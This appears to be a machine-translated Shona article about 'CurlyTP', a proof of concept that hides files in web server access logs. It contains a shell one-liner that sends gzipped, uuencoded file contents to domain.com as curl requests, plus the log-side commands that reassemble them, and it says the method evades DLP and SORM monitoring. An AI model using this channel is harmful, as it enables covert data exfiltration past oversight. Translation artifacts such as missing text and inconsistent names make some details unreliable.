Zvinoenderana netsanangudzo yeWikipedia, donho rakafa chishandiso chekurangana chinoshanda kuchinjanisa ruzivo kana zvimwe zvinhu pakati pevanhu vachishandisa nzvimbo yakavanzika. Pfungwa ndeyokuti vanhu havambosangana - asi ivo vachiri kuchinjana ruzivo kuchengetedza kuchengetedzwa kwekushanda.
Nzvimbo yekuvanda haifaniri kukwezva kutarisa. Naizvozvo, munyika isina Indaneti vanowanzoshandisa zvinhu zvine hungwaru: chidhinha chakasununguka mumadziro, bhuku reraibhurari, kana gomba mumuti.
Kune akawanda encryption uye anonymization maturusi paInternet, asi icho chaicho chekushandisa maturusi aya chinokwezva kutarisa. Pamusoro pezvo, vanogona kuvharirwa padanho rekambani kana rehurumende. Kuita sei?
Mugadziri Ryan Maruva akakurudzira sarudzo inonakidza - . Kana iwe uchifunga nezvazvo, web server inoita sei? Inogamuchira zvikumbiro, inopa mafaera uye inonyora matanda. Uye inonyora zvese zvikumbiro, kunyangwe zvisizvo!
Zvinoitika kuti chero sevha yewebhu inobvumidza iwe kuchengetedza chero meseji murogi. Maruva akashaya kuti oshandisa sei izvi.
Anopa iyi sarudzo:
- Tora mameseji faira (yakavanzika meseji) uye uverenge iyo hashi (md5sum).
- Isu tinoinyorera (gzip+uuencode).
- Isu tinonyorera kurogi tichishandisa chikumbiro chisina kururama nemaune kune server.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shKuti uverenge faira, unofanirwa kuita mashandiro aya mune reverse order: decode uye unzip iyo faira, tarisa hashi (iyo hashi inogona kufambiswa zvakachengeteka pamatanho akavhurika).
Nzvimbo dzinotsiviwa ne =+=kuitira kuti pasave nenzvimbo mukero. Iyo purogiramu, iyo iyo munyori anodana kuti CurlyTP, inoshandisa base64 encoding, senge email zvakanamatira. Chikumbiro chinoitwa neshoko rakakosha ?transfer?kuitira kuti mugamuchiri anogona kuzviwana zviri nyore mumatanda.
Chii chatinoona mumatanda munyaya iyi?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"Sezvatotaurwa, kuti ugamuchire meseji yakavanzika iwe unofanirwa kuita mashandiro acho mune reverse order:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gIyo nzira iri nyore kuita otomatiki. Md5sum machisi, uye zviri mukati mefaira zvinosimbisa kuti zvese zvakatemwa nemazvo.
Nzira yacho iri nyore kwazvo. "Pfungwa yechiitwa ichi ndeye kuratidza kuti mafaera anogona kutamiswa kuburikidza neasina mhosva zvikumbiro zvewebhu, uye zvinoshanda pane chero webhu server ine magwaro akajeka. Chaizvoizvo, sevha yese yewebhu inzvimbo yekuhwanda! " anonyora Maruva.
Ehezve, iyo nzira inoshanda chete kana mupikiri achikwanisa kuwana server matanda. Asi kuwana kwakadaro kunopihwa, semuenzaniso, nevazhinji vanogamuchira.
Kuishandisa sei?
Ryan Flowers anoti haasi nyanzvi yekuchengetedza ruzivo uye haazogadziri runyorwa rwezvinogona kushandiswa kweCurlyTP. Kwaari, ingori humbowo hwepfungwa yekuti zvishandiso zvakajairika zvatinoona zuva rega rega zvinogona kushandiswa nenzira isina kujairika.
Muchokwadi, iyi nzira ine huwandu hwezvakanakira pane imwe sevha "yakavanda" senge kana : haidi kurongeka kwakakosha padivi reseva kana chero akakosha maprotocol - uye hazvizomutsa fungidziro pakati peavo vanotarisa traffic. Hazvigoneke kuti SORM kana DLP system itarise ma URL eakamanikidzwa mameseji mafaera.
Iyi ndiyo imwe yenzira dzekutumira mameseji kuburikidza nemasevhisi mafaera. Unogona kuyeuka kuti mamwe makambani epamberi aimboisa sei kana mukodhi yemapeji eHTML.
Pfungwa yaive yekuti vanogadzira webhu chete ndivo vaizoona zai reIsita, nekuti munhuwo zvake aisazotarisa misoro kana HTML kodhi.
Source: www.habr.com